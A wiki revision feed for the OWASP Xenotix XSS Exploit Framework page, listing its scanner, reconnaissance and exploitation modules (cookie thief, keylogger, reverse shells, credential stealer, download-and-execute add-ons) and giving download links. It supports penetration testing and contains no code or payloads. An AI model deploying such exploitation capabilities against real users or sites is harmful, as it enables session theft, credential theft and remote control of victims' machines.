* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=168012</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=168012"/>
				<updated>2014-02-12T21:58:51Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: Version 5 Changes&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 5==&lt;br /&gt;
&lt;br /&gt;
[[Image:XenotixV5.png|left|600px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1600+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. Xenotix Scripting Engine allows you to create custom test cases and addons over the Xenotix API. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Manual Mode&lt;br /&gt;
*GET Request Auto Mode&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Request Repeater&lt;br /&gt;
*URL Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Get Network IP&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*Gram WebCam Screenshot&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
'''ClubHack 2013'''&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png||530px|thumb|Xenotix POST Request Scanner ]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png||530px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|530px|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|530px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Download.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar]]&lt;br /&gt;
&lt;br /&gt;
Requirements&lt;br /&gt;
Microsoft .NET Framework 4.0 http://www.microsoft.com/en-in/download/details.aspx?id=17718&lt;br /&gt;
IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Version 4.5 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4.5{{#ev:youtube|jm1-_nTlhzY}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 4 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v4{{#ev:youtube|dCo5BCJWOdA}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 3 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Scanner Module{{#ev:youtube|CJEgO4_kd-8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Keylogger{{#ev:youtube|owfF9C_Xerw}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Executable Drive-By{{#ev:youtube|i8c3kf4t6A8}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS Reverse Shell{{#ev:youtube|IT-8IH3yRrA}} &lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework v3: XSS DDoSer{{#ev:youtube|cgLGgVWvi9Y}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Version 2 Videos'''&lt;br /&gt;
 OWASP Xenotix XSS Exploit Framework Version 2 {{#ev:youtube|ei1ny7L8-8k}}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Project About=&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:Projects/OWASP Xenotix XSS Exploit Framework | Project About}}&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Download.png&amp;diff=168008</id>
		<title>File:Download.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Download.png&amp;diff=168008"/>
				<updated>2014-02-12T21:45:39Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: Ajin Abraham uploaded a new version of &amp;amp;quot;File:Download.png&amp;amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Scripting.png&amp;diff=168003</id>
		<title>File:Scripting.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Scripting.png&amp;diff=168003"/>
				<updated>2014-02-12T21:24:13Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:XenotixV5.png&amp;diff=168002</id>
		<title>File:XenotixV5.png</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:XenotixV5.png&amp;diff=168002"/>
				<updated>2014-02-12T21:06:58Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: OWASP Xenotix XSS Exploit Framework V 5&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;OWASP Xenotix XSS Exploit Framework V 5&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=167193</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=167193"/>
				<updated>2014-02-01T19:49:10Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework 4.5==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xenotix4.5.png|left|600px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides Zero False Positive scan results with its unique Triple Browser Engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s 2nd largest XSS Payloads of about 1500+ distinctive XSS Payloads for effective XSS vulnerability detection and WAF Bypass. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes highly offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Button1.png | link=http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar]]&lt;br /&gt;
* [https://www.dropbox.com/s/j6fajc73zz0dgje/Xenotix_XSS_Exploit_Framework_v4.5.rar Mirror]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
* [[OWASP_AntiSamy_Project]]&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Manual Mode Scanner&lt;br /&gt;
*Auto Mode Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
*Multiple Parameter Scanner&lt;br /&gt;
*POST Request Scanner&lt;br /&gt;
*Header Scanner&lt;br /&gt;
*Fuzzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
*Browser Fingerprinting&lt;br /&gt;
*Browser Features Detector&lt;br /&gt;
*Ping Scan&lt;br /&gt;
*Port Scan&lt;br /&gt;
*Internal Network Scan&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Phisher&lt;br /&gt;
*Tabnabbing&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Executable Drive By&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Drive-By Reverse Shell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Firefox Reverse Shell Addon (Persistent)&lt;br /&gt;
*Firefox Session Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Keylogger Addon (Persistent)&lt;br /&gt;
*Firefox DDoSer Addon (Persistent)&lt;br /&gt;
*Firefox Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
*Firefox Download and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''UTILITY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Payload Encoder&lt;br /&gt;
*JavaScript Beautify&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
